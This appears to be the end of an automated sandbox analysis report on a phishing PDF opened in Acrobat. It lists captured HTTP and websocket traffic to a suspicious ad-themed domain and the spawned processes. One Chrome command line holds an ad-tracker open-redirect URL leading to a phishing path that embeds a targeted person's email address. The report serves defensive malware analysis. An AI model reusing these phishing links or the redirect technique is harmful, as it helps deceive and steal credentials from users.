                                                                                                                                      2024-05-08 18:13:37 UTC1376OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 33 36 30 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 37 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 35 2e 31 34 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 30 6e 31 38 70 79 78 2d 63 6c 69
                                                                                                                                      Data Ascii: [{"age":23609,"body":{"elapsed_time":1078,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.15.140","status_code":404,"type":"http.error"},"type":"network-error","url":"https://0n18pyx-cli
                                                                                                                                      2024-05-08 18:13:37 UTC168INHTTP/1.1 200 OK
                                                                                                                                      content-length: 0
                                                                                                                                      date: Wed, 08 May 2024 18:13:37 GMT
                                                                                                                                      Via: 1.1 google
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      80192.168.2.1649804104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:43 UTC1345OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: Upgrade
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Upgrade: websocket
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-WebSocket-Version: 13
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IlNXY2lYTkZ1bjFBVVlXZW1rZUZTT1E9PSIsInZhbHVlIjoiOSttem5xem40UnB4U2h3SVJNNTR6WnhndldtWXhGVm1Gem13TkFrS29rKy9vMTJ1eVJ4WE02SEw1VVprcDRuSnVPa0FPNTgvNXdVSGJvVGkxc0l3bmc3NE9OSU5Pd3RGMUQ5WjJTaVdmakFwTHhTeHNiWWFabEN0ci9MOWp3MTUiLCJtYWMiOiIxMWExNTU4NzU4M2MyZjBiY2Q1YTM1Njc4YTY5ZmVhZTk3ZjcyNGYyODc5MDhiZjQ5YzAwYjZhZTc5MjhmMjk0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNBU0E1ejZYUnUwaXFOemxlTWozOEE9PSIsInZhbHVlIjoiQmJMcFVTN041QThWYzRZL1J1QlU2VUE1U2VUbkNOYUMrLzlxc2N6VkczMVpkcmpqQkhZTVp1anUzZ3NFMnh4clBmQUQ3WkNoeS9tVkFkVlJZckcxdlJjWG1iMnVuTXNJcEtiN1NZRDVybStpbGg3cWFLcXdIczZUSnRndVo2RG4iLCJtYWMiOiI0YTZmYmY5NWExZmQ0NmQ4NmQyMTYyMmUyNWFhNmIwNmFjYTZhYmRjMjBhZmI2YzIzNjA1ZGI1MTRiOTVhNjYxIiwidGFnIjoiIn0%3D
                                                                                                                                      Sec-WebSocket-Key: sxThGzGTz59bFMVr881xWw==
                                                                                                                                      Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                      2024-05-08 18:13:44 UTC619INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:13:44 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GoTz7x20jPt4DiEVQD47UNpC9Sc5NPVKExw2gTzyAIBwW14Cv%2FxiIxWHgER9g6WrZ2P2qMAoy%2BzFsKqGo9I2tl8GA4ERK%2F63oCA7gDkHmcp6lK61UJ6MpIR%2BauLzwQhud3xBly%2BoWzQM0zt98HuQib7RER1XRu%2FHrfBk2FJPszw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ce70bd2720b-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:13:44 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                                      Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                                      2024-05-08 18:13:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Click to jump to process

                                                                                                                                      Click to jump to process

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Click to jump to process

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:20:11:55
                                                                                                                                      Start date:08/05/2024
                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Saint Charles Borromeo Seminary-Wprckny.pdf"
                                                                                                                                      Imagebase:0x7ff637370000
                                                                                                                                      File size:5'641'176 bytes
                                                                                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:20:11:56
                                                                                                                                      Start date:08/05/2024
                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                                      Imagebase:0x7ff7081a0000
                                                                                                                                      File size:3'581'912 bytes
                                                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:20:11:56
                                                                                                                                      Start date:08/05/2024
                                                                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1628,i,15175157218959621648,12133064567235996358,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                                      Imagebase:0x7ff7081a0000
                                                                                                                                      File size:3'581'912 bytes
                                                                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:20:12:27
                                                                                                                                      Start date:08/05/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin/file/hthehdkshjjsn/ojkcisnckbdshciudcbjdss/8929/mmclaughlin@scs.edu##
                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:20:12:28
                                                                                                                                      Start date:08/05/2024
                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1940,i,3111557400391393984,2327874427274712486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                      Imagebase:0x7ff7f9810000
                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      No disassembly